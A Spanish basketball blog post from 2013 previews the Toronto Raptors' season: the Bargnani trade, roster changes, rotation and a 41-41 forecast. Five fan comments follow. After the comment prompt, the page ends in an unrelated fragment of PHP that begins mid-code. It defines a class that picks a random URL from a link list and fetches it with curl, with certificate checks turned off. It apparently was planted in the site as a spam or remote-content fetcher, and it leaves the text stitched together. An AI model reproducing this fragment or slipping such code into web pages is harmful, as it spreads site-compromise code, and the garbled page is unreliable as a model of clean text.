Toronto Raptors: 30 partidos de margen

27 de September de 2013 por txusma

El 31 de Mayo, Masai Ujiri volvía a los Toronto Raptors tras ganar el “Executive of the Year” gracias a su labor en los Denver Nuggets. Tras pasarse un mes consultando los libros de contabilidad y revisando los partidos de la temporada anterior optó por tomar la decisión que Bryan Colangelo evitaba desde hacía tiempo. Libre de cualquier lastre emocional envió a Andrea Bargnani a los Knicks a cambio de Steve Novak, Marcus Camby, Quentin Richardson, una 1ª ronda de 2016 y un par de rondas más. ¡No solo consiguió librarse del contrato del italiano (23 millones entre ésta y la siguiente temporada) sinó que además consiguió algo a cambio! Genio y figura.

Con la mayoría del trabajo ya hecho (recordemos que Rudy Gay llegó a los Raptors a mitad de temporada), Ujiri se ha limitado a retocar la plantilla. Ha dejado irse a Telfair y Pietrus, amnistió a Linas Kleiza (aunque a lo mejor ahora se arrepiente tras el buen final de Eurobasket que se ha marcado el lituano) y ha firmado un par jugadores solventes para mejorar la segunda unidad como Tyler Hansbrough y DJ Augustine. Detalles necesarios para conformar una plantilla que a priori luchará por entrar en los Playoffs.

A primera vista los Raptors tienen potencial para luchar por el sexto puesto del Este. La mejora del juego con la llegada de Gay, el hecho de que contarán con él desde el primer día de training camp, la mejora del banquillo, el desarrollo de Jonas Valanciunas y Terrence Ross, el contract year de Kyle Lowry, la salida de Bargnani… Todo apunta a que los canadienses serán mejores que el año pasado pero tampoco tienen el puesto de playoffs asegurado porque hay un grupo de 5-6 equipos con un nivel similar que pelearán por esas posiciones. Ujiri debió perder horas de sueño en su momento decidiendo si pelear por los Playoffs este año o apuntarse a la moda del “tankeo”. Finalmente, parece haber decidido empezar con lo puesto y dejar avanzar la temporada. Si los primeros 20-30 partidos van bien es posible que decida seguir hasta el final. Si en los primeros partidos el equipo flojea, a lo mejor empaqueta a Rudy Gay y Demar DeRozan y da órdenes expresas de no sudar demasiado en la pista para mejorar sus oportunidades de pescar algo en el próximo draft, que se ha convertido en la tabla de salvación de muchos equipos de la liga. Por eso la publicación del calendario de la NBA fue un día importante para los aficionados. Antes del 31 de Diciembre, los canadienses disputarán 16 partidos contra equipo superiores sobre el papel, 8 contra equipos de nivel similar y tan solo 5 contra equipos que van a tirar la temporada desde el minuto 1 del primer partido. No les será nada fácil llegar con el 50% de victorias al 1 de Enero de 2014, aunque yo creo que no se quedarán lejos. Si llegan con un 13-16 y están en en puesto sde playoffs, lucharán por estar en pre-temporada. 

Como comentábamos, equipo hay para Playoffs. Los aficionados canadienses esperan que Kyle Lowry muestre un poco más de profesionalidad y no tenga problemas de lesiones. El año pasado llegó bastante fuera de forma y encima tuvo algún problema con el entrenador, Dwane Casey. Más le vale estar acertado porque se encuentra en el último año de contrato, algo siempre positivo para el equipo. Un Lowry a un nivel cercano al que mostró en Houston supondría una amenaza constante para el rival y un suplemento extra a la tralla ofensiva de los canadienses. Su suplente este año será DJ Augustine, un jugador prácticamente invisible en los Pacers.

En las alas los Raptors cuenta con Demar DeRozan y Rudy Gay, dos jugadores de corte similar que aseguran muchos puntos y variantes ofensivas. Tienen todo un training camp para compenetrarse y consolidar el juego que ya compartieron durante 33 partidos de la temporada pasada. Su entendimiento será clave para el futuro del equipo. DeRozan se enfrenta a lo que puede ser el año clave de su carrera. Necesita dar un paso adelante y convertirse en una amenaza a la del nivel que presenta su compañero. Esta pareja puede dar más de un dolor de cabeza a cualquier defensa exterior de la liga. El tercer hombre será Terrence Ross, que apunta a sexto hombre del equipo. De momento le conocemos sobretodo por el ser campeón del último concurso de mates pero durante la temporada nos ha dejado destellos de lo que puede llegar a ser. Jugador muy atlético pero que es capaz de anotar desde varias posiciones. Llega el momento de dar un paso adelante. Si hubiera un traspaso a  mitad de temporada (que involucrara a Gay o a DeRozan o a ambos) él sería el mayor beneficiado. Landry Fields completa la rotación. Jugador correcto con contrato exagerado (en la 2014-2015 cobrará 8’5 kilos) pero que puede ser de mucha ayuda si consigue mantenerse sano y gozar de cierta continuidad. Steve Novak aportará tiro y amenaza exterior.

En el juego interior la salida de Bargnani deja vía libre a Jonas Valanciunas. Hay muchas ilusiones depositadas en su desarrollo. El lituano, al que hemos podido ver en el Eurobasket, ha cogido mucho músculo y parece preparado para pelearse con quien sea dentro de las zonas de la NBA. Acabó la temporada muy fuerte e incluso fue nombrado rookie del mes de Marzo. Para elevar el hype, Valanciunas fue también nombrado MVP de la SummerLeague de Las Vegas. Normal que la excitación invada las calles de Toronto. A su lado jugará Amir Johnson que viene de protagonizar la mejor temporada de su carrera a pesar de salir de suplente la mayoría de partidos. Pieza clave en defensa, este año será titular y es probable que llegue a los 30 minutos por partido. Para completar el juego interior los Raptors se han hecho con los servicios de Tyler Hansbrough a un precio muy competitivo. El ex de los Pacers asegura intensidad, pelea y carácter ganador y tendrá sus minutos en la corta rotación de los canadienses.

Interesante temporada la que afrontan los Raptors. Han conformado un buen equipo formado por varios jugadores que se conocen desde hace años y que han declarado ser amigos. Esta química puede resultar muy importante en los primeros partidos de la temporada que se antojan cruciales para el desarrollo del equipo y para convencer a Ujiri de que pueden llegar a los Playoffs. Con Lowry, Gay y DeRozan por fuera y Jonas Valanciunas por dentro hay muchas posibilidades.

Altas: Steve Novak (NYK),  DJ Augustine (IND), Tyler Hansbrough (IND), Austin Daye (MEM), Dwight Buycks
Bajas: Andrea Bargnani (NYK), Alan Anderson (BKN), Sebastian Telfair, Linas Kleiza, Mickael Pietrus

Quinteto: Kyle Lowry, Demar DeRozan, Rudy Gay, Amir Johnson, Jonas Valanciunas
6º Hombre: Terrence Ross/Tyler Hansbrough

Pronóstico: 7º conferencia Este (41-41). 1ª ronda de Playoffs.

Comenta

5 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Por nombres deberían ser un “must” en PO,no hay que obviar que es un equipo con jugadores con cierto caché y que han alcanzado nivel AllStar en momentos de sus carreras(hablo de Lowry y Gay).La clave pasa por saber distribuir el protagonismo.Creo que Valanciunas debe ser fundamental para alcanzar los PO y en ese sentido,teniendo en cuenta como son DeRozan y Gay,sumar un Lowry queriéndose ganar contrato (aunque viendo lo barato que firmó con los Raptors a saber) lo veo contraproducente.Por ejemplo Amir o Psycho-T son más jugadores de equipo en ese aspecto.Vamos a ver cómo se resuelve ese reparto ofensivo pero de primeras un base más director que anotador sería a mi juicio lo ideal.

    Alan Anderson fue bastante importante en muchos partidos la temporada pasada,como 6º hombre,aunque su baja parece compensada con lo que pueda progresar Ross -para mí apunta a mucho más jugador de lo que es DeRozan- y los triples de Novak.

    Lo peor de todo es que aparezca Wiggins en el horizonte,aunque con equipos como 76ers o Suns por ahí parece una quimera que por mucho tanqueo que hagan pudieran hacerse con uno de los mayores talentos y encima canadiense,así que mucho mejor lucir el equipo de una ciudad que según apuntan los rumores organizará el All Star en 2016.

      Citar

  2. Esteban dice:
    #2

    no comparto varias cosas

    conseguir algo por bargnani no era tan complicado; sacando sus problemas de lesiones, ha sido un jugador capaz de anotar 20 puntos por partido sin dificultades, es cierto no rebotea ni defiende, pero negros altos que reboteen y defiendan sobran en la liga, un tio de 2.10 capaz de lanxzar de 3 y anotar con solvencia son poquitos

    bargnani aun tenia valor, los knicks pagaron mucho quiza por el, pero por menos no se iba a ir, y menos iba a ser amnistiado

    tampoco veo la banca mejorada, augustine viene de un año pesimo en los pacers y hasbrough viene en picada desde hace dos años, no solo no ha dado un paso al frente sino que parece haber dado alguno para atras

    ni hablar de fields y su ridiculo contrato

    los mejor pasa por el perimetro, con esos 3 perimetras y jhonson de interno, los raptors deben correr y correr y lanzar y lanzar; si establecen un modo de juego o un estilo de muchas posesiones y muy rapido, la juventud y fuerza de sus jugadores (no me olvido de ross) puede serles muy favorable

    valanciunas es candidato al all-star y al jugador mas mejorada, siempre me parece que le ha costado el friccionado juego europeo, pero con mas espacios en la nba no me quedan dudas que hara un apepel excelente

    bucks, wizards, cavs, estan en su nivel asi q los po no son seguros

      Citar

  3. Denise dice:
    #3

    Yo no los veo en Playoffs. Salvo lesiones, considero a los Cavs y a los Wizards superiores, y las 6 primeras plazas de PO del Este están cerradas (MIA, BRO, IND, NYK, CHI, DET).
    La combinación De Rozan – Gay no me gusta. Creo que sobra uno, el cual sería Demarr. Amir Johnson me parece un jugador muy sobrevalorado y poco práctico de titular, y Lowry no creo que vuelva a hacer en la vida un temporadón parecido al que hizo en Houston hace 2 años. Además, después en el traspaso de Bargnani, los Raptors podrían haber sacado mucho más a cambio.

      Citar

  4. rumbero dice:
    #4

    A mi tampoco me acaba de convencer la dupla De Roza- Gay. Muy peligrosa algunos partidos y una bicoca cuando no andan finos. Pero bueno, Gay se ha operado de la vista porque no veía un pijo. Igual con eso mejora los porcentajes que tuvo en algunos momentos la temporada pasada. Y luego está Valanciunas que en teoría la tiene que romper en cualquier momento pero yo quiero verlo. Más que músculo ha ganado culo y si bien es cierto que en la SL se paseó bastante tiene que pasar la prueba con los grandotes de verdad.
    Yo creo que lo van a pelear aunque no me acaba entusiasmar el equipo. Quizás la evolución de Terence Ross y ver como responde Psycho-T al cambio de equipo es que más me llama la atención

      Citar

  5. Esteban dice:
    #5

    A mi en realidad me gusta su roster

    Hacer defender y q sean mas solidarios no es tan complicado, como hacer buenos a jugadores malos q no puieden meterla en el aro (miren a los bobcats los ultimos dos añs)

    En principio tienen dos tios como rudy y demar capaces de anotar sus lanzamientos y resolver ataques complicados por talento, eso no es poco, ahora hay q darles un estilo de equipo

    PO dependera de q tan bueno pueda saer valanciunas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>